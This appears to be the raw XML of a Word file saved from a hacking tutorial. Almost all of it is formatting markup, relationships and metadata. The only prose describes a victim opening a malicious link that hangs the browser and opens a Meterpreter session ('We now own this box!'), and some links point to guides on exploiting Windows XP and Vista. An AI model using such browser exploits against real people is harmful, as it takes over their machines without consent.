          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C057B">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">When the victim tries to load the page, nothing will be displayed. The browser will hang, but we will have activity at our </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005C057B">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>msfconsole</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005C057B">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">. When the victim navigates to the link it will open </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005C057B">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005C057B">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> active Meterpreter session that we are connected to. We now own this box!</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004E268C" w:rsidRPr="005C057B" w:rsidRDefault="004E268C" w:rsidP="005C057B">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="004E268C" w:rsidRPr="005C0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A40F07"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="80BC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858"/>
    <w:rsid w:val="000A326C"/>
    <w:rsid w:val="004E268C"/>
    <w:rsid w:val="00576858"/>
    <w:rsid w:val="005C0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3121FD-2AB5-4628-A8A2-7207B93A3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05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C05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5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C057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C057B"/>
    <w:rPr>
      <w:color w:val="0000FF"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="series">
    <w:name w:val="series"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="005C057B"/>
  </w:style>
  <w:style w:type="character" w:styleId="Strong">
    <w:name w:val="Strong"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="22"/>
    <w:qFormat/>
    <w:rsid w:val="005C057B"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="NormalWeb">
    <w:name w:val="Normal (Web)"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="005C05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5C057B"/>
  </w:style>
  <w:style w:type="character" w:styleId="Emphasis">
    <w:name w:val="Emphasis"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="20"/>
    <w:qFormat/>
    <w:rsid w:val="005C05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541918">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="1137456944">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="1973562216">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="405611799">
                  <w:marLeft w:val="0"/>
                  <w:marRight w:val="0"/>
                  <w:marTop w:val="0"/>
                  <w:marBottom w:val="0"/>
                  <w:divBdr>
                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                  </w:divBdr>
                  <w:divsChild>
                    <w:div w:id="460921234">
                      <w:marLeft w:val="0"/>
                      <w:marRight w:val="0"/>
                      <w:marTop w:val="0"/>
                      <w:marBottom w:val="0"/>
                      <w:divBdr>
                        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                      </w:divBdr>
                      <w:divsChild>
                        <w:div w:id="1926911500">
                          <w:marLeft w:val="0"/>
                          <w:marRight w:val="0"/>
                          <w:marTop w:val="0"/>
                          <w:marBottom w:val="0"/>
                          <w:divBdr>
                            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                          </w:divBdr>
                          <w:divsChild>
                            <w:div w:id="39673402">
                              <w:marLeft w:val="0"/>
                              <w:marRight w:val="0"/>
                              <w:marTop w:val="0"/>
                              <w:marBottom w:val="0"/>
                              <w:divBdr>
                                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                              </w:divBdr>
                              <w:divsChild>
                                <w:div w:id="1010303082">
                                  <w:marLeft w:val="0"/>
                                  <w:marRight w:val="0"/>
                                  <w:marTop w:val="0"/>
                                  <w:marBottom w:val="0"/>
                                  <w:divBdr>
                                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                  </w:divBdr>
                                  <w:divsChild>
                                    <w:div w:id="2127264665">
                                      <w:marLeft w:val="0"/>
                                      <w:marRight w:val="0"/>
                                      <w:marTop w:val="0"/>
                                      <w:marBottom w:val="0"/>
                                      <w:divBdr>
                                        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                      </w:divBdr>
                                    </w:div>
                                  </w:divsChild>
                                </w:div>
                                <w:div w:id="41904872">
                                  <w:marLeft w:val="0"/>
                                  <w:marRight w:val="0"/>
                                  <w:marTop w:val="0"/>
                                  <w:marBottom w:val="0"/>
                                  <w:divBdr>
                                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                  </w:divBdr>
                                  <w:divsChild>
                                    <w:div w:id="2048096555">
                                      <w:marLeft w:val="0"/>
                                      <w:marRight w:val="0"/>
                                      <w:marTop w:val="0"/>
                                      <w:marBottom w:val="0"/>
                                      <w:divBdr>
                                        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                      </w:divBdr>
                                    </w:div>
                                  </w:divsChild>
                                </w:div>
                                <w:div w:id="946691622">
                                  <w:marLeft w:val="0"/>
                                  <w:marRight w:val="0"/>
                                  <w:marTop w:val="0"/>
                                  <w:marBottom w:val="0"/>
                                  <w:divBdr>
                                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                  </w:divBdr>
                                  <w:divsChild>
                                    <w:div w:id="19938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or.wonderhowto.com/occupythewebotw/"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null-byte.wonderhowto.com/how-to/hack-like-pro-exploit-and-gain-remote-access-pcs-running-windows-xp-0134709/" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://img.wonderhowto.com/img/original/00/75/63485307681612/0/634853076816120075.jp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ull-byte.wonderhowto.com/how-to/hack-like-pro-hacking-windows-vista-by-exploiting-smb2-vulnerabilities-0138376/" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image1.jpeg"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://creator.wonderhowto.com/occupythewebotw/" TargetMode="External"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image3.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://img.wonderhowto.com/img/original/87/99/63485307608993/0/634853076089938799.jpg" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/webSettings" Target="webSettings.xml"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://null-byte.wonderhowto.com/how-to/hack-like-pro-getting-started-with-metasploit-0134442/" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://img.wonderhowto.com/img/original/66/37/63485307827456/0/634853078274566637.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680</Words>
  <Characters>3882</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>32</Lines>
  <Paragraphs>9</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <Company/>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>4553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4</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2019-03-15T06:07:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2019-03-22T20:59:00Z</dcterms:modified>
</cp:coreProperties>
</file>